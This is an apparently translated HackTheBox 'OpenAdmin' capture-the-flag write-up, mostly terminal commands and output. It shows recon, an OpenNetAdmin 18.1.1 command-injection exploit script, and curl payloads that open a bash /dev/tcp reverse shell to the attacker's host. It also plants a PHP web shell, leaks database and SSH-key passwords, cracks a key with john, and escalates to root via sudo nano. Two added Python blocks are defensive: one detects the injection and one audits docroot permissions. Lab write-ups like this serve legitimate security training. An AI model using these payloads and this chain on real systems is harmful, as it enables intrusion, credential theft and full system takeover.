title: HackTheBox-OpenAdmin author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/OpenAdmin.png tags:
•Linux
Crazy:~/HackThebox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.171
[sudo] crazyinside 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 06:01:02 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.171
Discovered open port 80/tcp on 10.10.10.171
Crazy:~/HackThebox/OpenAdmin$ sudo nmap -sC -sV 10.10.10.171 -oN OpenAdmin -p22,80
[sudo] crazyinside 的密码:
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 14:03 CST
Nmap scan report for 10.10.10.171
Host is up (0.096s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b98df85d17ef03dda48cdbc9200b754 (RSA)
| 256 dceb3dc944d118b122b4cfdebd6c7a54 (ECDSA)
|_ 256 dcadca3c11315b6fe6a489347c9be550 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.83 seconds
zsh: segmentation fault sudo nmap -sC -sV 10.10.10.171 -oN OpenAdmin -p22,80
Crazy:~/HackThebox/OpenAdmin$ curl -I 10.10.10.171
HTTP/1.1 200 OK
Date: Mon, 22 Aug 2022 06:04:16 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Thu, 21 Nov 2019 14:08:45 GMT
ETag: "2aa6-597dbd5dcea8b"
Accept-Ranges: bytes
Content-Length: 10918
Vary: Accept-Encoding
Content-Type: text/html
Port 80 serves the Apache default page.
Crazy:~/HackThebox$ dirsearch -u http://10.10.10.171/
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/10.10.10.171/-_22-08-22_14-04-03.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-22-08-22_14-04-03.log
Target: http://10.10.10.171/
[14:04:03] Starting:
[14:04:11] 403 - 277B - /.ht_wsr.txt
[14:04:11] 403 - 277B - /.htaccess.save
[14:04:11] 403 - 277B - /.htaccess.sample
[14:04:11] 403 - 277B - /.htaccess.bak1
[14:04:11] 403 - 277B - /.htaccess_extra
[14:04:11] 403 - 277B - /.htaccessOLD
[14:04:11] 403 - 277B - /.htaccess.orig
[14:04:11] 403 - 277B - /.htaccess_orig
[14:04:11] 403 - 277B - /.htaccess_sc
[14:04:11] 403 - 277B - /.htaccessBAK
[14:04:11] 403 - 277B - /.htaccessOLD2
[14:04:11] 403 - 277B - /.htm
[14:04:11] 403 - 277B - /.httr-oauth
[14:04:11] 403 - 277B - /.html
[14:04:11] 403 - 277B - /.htpasswd_test
[14:04:11] 403 - 277B - /.htpasswds
[14:04:13] 403 - 277B - /.php
[14:04:59] 200 - 11KB - /index.html
[14:05:07] 301 - 312B - /music -> http://10.10.10.171/music/
[14:05:09] 301 - 310B - /ona -> http://10.10.10.171/ona/
[14:05:18] 403 - 277B - /server-status
[14:05:18] 403 - 277B - /server-status/
These are all static pages; following the login link redirects to
and following the help index leads to GitHub, where the default credentials are stated to be admin:admin.
Crazy:~/HackThebox/OpenAdmin$ searchsploit opennetadmin
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
The msf module doesn't seem to be of much use:
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > show options
Module options (exploit/unix/webapp/opennetadmin_ping_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /ona/login.php yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set RHOSTS 10.10.10.171
RHOSTS => 10.10.10.171
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set LHOST 10.10.16.3
LHOST => 10.10.16.3
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run
[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Exploiting...
[*] Command Stager progress - 100.00% done (702/702 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > exploit
[*] Started reverse TCP handler on 10.10.16.3:4444
[*] Exploiting...
[*] Command Stager progress - 100.00% done (702/702 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) >
Crazy:~/HackThebox/OpenAdmin$ cat 47691.sh
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo "BEGIN";${cmd};echo "END"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
Crazy:~/HackThebox/OpenAdmin$
Crazy:~/HackThebox/OpenAdmin$ curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping" http://10.10.10.171/ona/
The command output is echoed back in the page:
</tr>
</table>
<!-- Module Output -->
<table style="background-color: #F2F2F2; padding-left: 25px; padding-right: 25px;" width="100%" cellspacing="0" border="0" cellpadding="0">
<tr>
<td align="left" class="padding">
<br>
<div style="border: solid 2px #000000; background-color: #FFFFFF; width: 650px; height: 350px; overflow: auto;resize: both;">
<pre style="padding: 4px;font-family: monospace;">BEGIN
uid=33(www-data) gid=33(www-data) groups=33(www-data)
END
</pre>
</div>
</td>
</tr>
</table>
<!-- Just a little padding -->
<table style="background-color: #F2F2F2; padding-left: 25px; padding-right: 25px;" width="100%" cellspacing="0" border="0" cellpadding="0">
<tr>
<td id="tooltips_extras" align="center" class="padding"><input type="button" class="edit" name="Close" value="Close" onclick="removeElement('tooltips_results');"><br></td>
</tr>
</table>
</td>
</tr>
</table>]]></cmd><cmd n="js"><![CDATA[toggle_window('tooltips_results');]]></cmd></xjx>
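Because the injection travels in the POST body, it never shows up in a plain access log. The following is an added detection example (not part of the writeup) that inspects a captured request body to /ona/, assuming the xajax window_submit/ping shape seen above; both sample bodies are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample bodies: the first mirrors the injected request in the writeup,
# the second is the assumed shape of a legitimate ONA "ping" tooltip request.
SAMPLE_BODIES = {
    'injected': 'xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips'
                '&xajaxargs[]=ip%3D%3E;echo "BEGIN";id;echo "END"&xajaxargs[]=ping',
    'benign': 'xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips'
              '&xajaxargs[]=ip%3D%3E10.10.10.1&xajaxargs[]=ping',
}

SHELL_META = re.compile(r'[;|&`$<>(){}\n]')
SAFE_TARGET = re.compile(r'^[A-Za-z0-9.\-:]+$')  # bare hostname, IPv4 or IPv6

def parse_body(body):
    """Split a form body on '&' only (never on ';', which is part of the payload here)."""
    params = {}
    for pair in body.split('&'):
        key, _, value = pair.partition('=')
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def analyze_ona_request(body):
    """Classify one POST body to /ona/: is it the window_submit/ping tooltip call,
    what was passed as the 'ip' argument, and does that argument look injected?"""
    params = parse_body(body)
    args = params.get('xajaxargs[]', [])
    finding = {'is_ping_tooltip': False, 'target': None, 'suspicious': False, 'reason': ''}
    if params.get('xajax') != ['window_submit'] or 'ping' not in args:
        return finding
    finding['is_ping_tooltip'] = True
    for arg in args:
        if arg.startswith('ip=>'):
            target = arg[len('ip=>'):]
            finding['target'] = target
            if SHELL_META.search(target):
                finding['suspicious'], finding['reason'] = True, 'shell metacharacters in ping target'
            elif not SAFE_TARGET.match(target):
                finding['suspicious'], finding['reason'] = True, 'ping target is not a plain host/IP'
    return finding

if __name__ == '__main__':
    for name, body in SAMPLE_BODIES.items():
        print(name, analyze_ona_request(body))
```

Feed it request bodies from a reverse proxy or WAF that logs POST data; anything flagged suspicious on the ping tooltip is worth an alert.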
Crazy:~/HackThebox/OpenAdmin$ curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo "BEGIN";bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.16.3%2F1337%200%3E%261%27;echo "END"&xajaxargs[]=ping" http://10.10.10.171/ona/
www-data@openadmin:/var/www/html/ona/local/config$ ls
database_settings.inc.php motd.txt.example run_installer
<ml/ona/local/config$ cat database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
?>www-data@openadmin:/var/www/html/ona/local/config$
There is nothing useful in the database:
mysql> select * from users;
+----+----------+----------------------------------+-------+---------------------+---------------------+
| id | username | password | level | ctime | atime |
+----+----------+----------------------------------+-------+---------------------+---------------------+
| 1 | guest | 098f6bcd4621d373cade4e832627b4f6 | 0 | 2022-08-22 06:31:46 | 2022-08-22 06:31:46 |
| 2 | admin | 21232f297a57a5a743894a0e4a801fc3 | 0 | 2022-08-22 06:16:34 | 2022-08-22 06:16:34 |
+----+----------+----------------------------------+-------+---------------------+---------------------+
Password reuse lets us log in as jimmy:
jimmy@openadmin:/etc/apache2/sites-enabled$ ls
internal.conf openadmin.conf
jimmy@openadmin:/etc/apache2/sites-enabled$ cat internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
jimmy@openadmin:/etc/apache2/sites-enabled$
Something seems to be running on port 52846 as well:
Crazy:~/HackThebox/OpenAdmin$ ssh jimmy@10.10.10.171 -L 52846:localhost:52846
The authenticity of host '10.10.10.171 (10.10.10.171)' can't be established.
ED25519 key fingerprint is SHA256:wrS/uECrHJqacx68XwnuvI9W+bbKl+rKdSh799gacqo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.171' (ED25519) to the list of known hosts.
jimmy@10.10.10.171's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
jimmy@openadmin:/var/www/internal$ ls
index.php logout.php main.php
jimmy@openadmin:/var/www/internal$ echo 1 > 1.txt
jimmy@openadmin:/var/www/internal$ ls
1.txt index.php logout.php main.php
echo '<?php system($_GET["hack"]); ?>' > hack.php
jimmy@openadmin:/var/www/internal$
curl 'http://127.0.0.1:52846/hack.php?hack=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.16.3/1338%200%3E%261%27'
Triggering it from any session will do:
Crazy:~/HackThebox$ nc -lvnp 1338
listening on [any] 1338 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.171] 49182
bash: cannot set terminal process group (1221): Inappropriate ioctl for device
bash: no job control in this shell
joanna@openadmin:/var/www/internal$
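The jimmy to joanna step works only because an mpm_itk vhost runs as joanna while its DocumentRoot is writable by another user. The following is an added audit example (not from the writeup) that parses vhost configs like internal.conf above and flags such roots; the conf text is a constructed copy, and the policy check is kept separate from the filesystem call so it can be tested offline.

```python
import os
import pwd
import re
import stat

# Constructed copy of the internal.conf shown in the writeup.
INTERNAL_CONF = """Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
</VirtualHost>
"""

def parse_itk_vhosts(conf_text):
    """Return [(document_root, run_as_user)] for every VirtualHost that uses AssignUserID."""
    found = []
    for block in re.findall(r'<VirtualHost[^>]*>(.*?)</VirtualHost>', conf_text, re.S):
        root = re.search(r'^\s*DocumentRoot\s+(\S+)', block, re.M)
        user = re.search(r'^\s*AssignUserID\s+(\S+)\s+\S+', block, re.M)
        if root and user:
            found.append((root.group(1), user.group(1)))
    return found

def assess_docroot(run_as_user, owner, mode):
    """Pure policy check on a DocumentRoot's owner and permission bits.
    Anyone who can drop PHP into the root executes code as run_as_user,
    so only root or that user may own it and it must not be writable by others."""
    issues = []
    if mode & stat.S_IWOTH:
        issues.append('world-writable')
    if mode & stat.S_IWGRP:
        issues.append('group-writable')
    if owner not in ('root', run_as_user):
        issues.append(f'owned by {owner}, not root or {run_as_user}')
    return issues

def audit_live(conf_text):
    """Run the check against the real filesystem; returns {docroot: [issues]}."""
    report = {}
    for root, run_as in parse_itk_vhosts(conf_text):
        try:
            st = os.stat(root)
            owner = pwd.getpwuid(st.st_uid).pw_name
        except (FileNotFoundError, KeyError) as exc:
            report[root] = [f'could not stat or resolve owner: {exc}']
            continue
        report[root] = assess_docroot(run_as, owner, stat.S_IMODE(st.st_mode))
    return report
```

Run `audit_live(open('/etc/apache2/sites-enabled/internal.conf').read())` on the host to see the live result.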
But this kind of shell is quite restricted; running sudo throws an error. I tried reading id_rsa from the user's home directory, but using it requires a passphrase:
Crazy:~/HackThebox/OpenAdmin$ ssh2john id_rsa > hash
Crazy:~/HackThebox/OpenAdmin$ john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (id_rsa)
1g 0:00:00:02 DONE (2022-08-22 14:54) 0.4566g/s 4371Kp/s 4371Kc/s 4371KC/s bloodofyouth..bloodmabite
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Crazy:~/HackThebox/OpenAdmin$
Crazy:~/HackThebox/OpenAdmin$ ssh -i id_rsa joanna@10.10.10.171
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Aug 22 06:50:19 UTC 2022
System load: 0.01 Processes: 182
Usage of /: 31.0% of 7.81GB Users logged in: 1
Memory usage: 14% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
39 packages can be updated.
11 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jul 27 06:12:07 2021 from 10.10.14.15
joanna@openadmin:~$ ls
pwk.py user.txt
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin, mail_badpass
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
joanna@openadmin:~$
This privilege escalation uses nano's ability to execute commands, but typing a command directly freezes; you have to enter reset; /bin/sh 1>&0 2>&0, after which the telltale root # prompt appears:
Command to execute: reset; /bin/sh 1>&0 2>&0# id
uid=0(root) gid=0(root) groups=0(root) ^X Read File
# cat /root/root.txt M-F New Buffer
2984.................................
#